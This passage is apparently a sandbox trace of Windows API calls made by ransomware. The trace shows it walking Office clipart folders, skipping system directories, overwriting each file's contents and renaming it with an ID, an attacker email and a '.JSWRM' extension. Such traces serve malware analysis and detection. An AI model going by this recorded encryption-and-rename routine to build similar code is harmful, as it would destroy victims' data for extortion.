dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0278702.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0278702.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.652] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed05f07, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xed05f07, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf2fbd2e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4330, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0279644.WMF", cAlternateFileName="")) returned 1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2=".") returned 1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="..") returned 1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="...") returned 1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="windows") returned -1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="recovery") returned -1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="perflogs") returned -1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="documents and settings") returned 1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="system volume information") returned -1 [0088.652] lstrcmpiW (lpString1="J0279644.WMF", lpString2="msocache") returned -1 [0088.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0279644.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0279644.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0279644.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0088.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0279644.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0279644.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0279644.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0088.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0088.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.653] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17200) returned 1 [0088.653] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4330) returned 0x24d210 [0088.654] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4330, lpOverlapped=0x0) returned 1 [0088.656] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.657] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4330, lpOverlapped=0x0) returned 1 [0088.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.657] CloseHandle (hObject=0x314) returned 1 [0088.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0088.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0088.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0088.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0279644.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0279644.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0088.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0088.658] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11dee, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0280468.WMF", cAlternateFileName="")) returned 1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2=".") returned 1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="..") returned 1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="...") returned 1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="windows") returned -1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="recovery") returned -1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="perflogs") returned -1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="documents and settings") returned 1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="system volume information") returned -1 [0088.658] lstrcmpiW (lpString1="J0280468.WMF", lpString2="msocache") returned -1 [0088.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0280468.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0280468.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0280468.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0280468.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0280468.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0280468.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0088.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.659] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=73198) returned 1 [0088.659] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11de0) returned 0x24d210 [0088.659] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x11de0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x11de0, lpOverlapped=0x0) returned 1 [0088.665] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.665] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x11de0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x11de0, lpOverlapped=0x0) returned 1 [0088.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.667] CloseHandle (hObject=0x314) returned 1 [0088.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0088.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0088.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0088.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0088.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0088.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.667] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0280468.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0280468.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0088.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.668] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x94c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0281008.WMF", cAlternateFileName="")) returned 1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2=".") returned 1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="..") returned 1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="...") returned 1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="windows") returned -1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="recovery") returned -1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="perflogs") returned -1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="documents and settings") returned 1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="system volume information") returned -1 [0088.668] lstrcmpiW (lpString1="J0281008.WMF", lpString2="msocache") returned -1 [0088.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281008.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281008.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281008.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0088.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281008.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0281008.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0281008.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0088.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.670] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=38084) returned 1 [0088.670] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x94c0) returned 0x24d210 [0088.671] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x94c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x94c0, lpOverlapped=0x0) returned 1 [0088.684] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.684] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x94c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x94c0, lpOverlapped=0x0) returned 1 [0088.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.685] CloseHandle (hObject=0x314) returned 1 [0088.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0088.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0088.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0088.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0088.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0088.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0088.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281008.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281008.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0088.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0088.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.686] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf36e46d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf36e46d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb5b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0281243.WMF", cAlternateFileName="")) returned 1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2=".") returned 1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="..") returned 1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="...") returned 1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="windows") returned -1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="recovery") returned -1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="perflogs") returned -1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="documents and settings") returned 1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="system volume information") returned -1 [0088.687] lstrcmpiW (lpString1="J0281243.WMF", lpString2="msocache") returned -1 [0088.687] 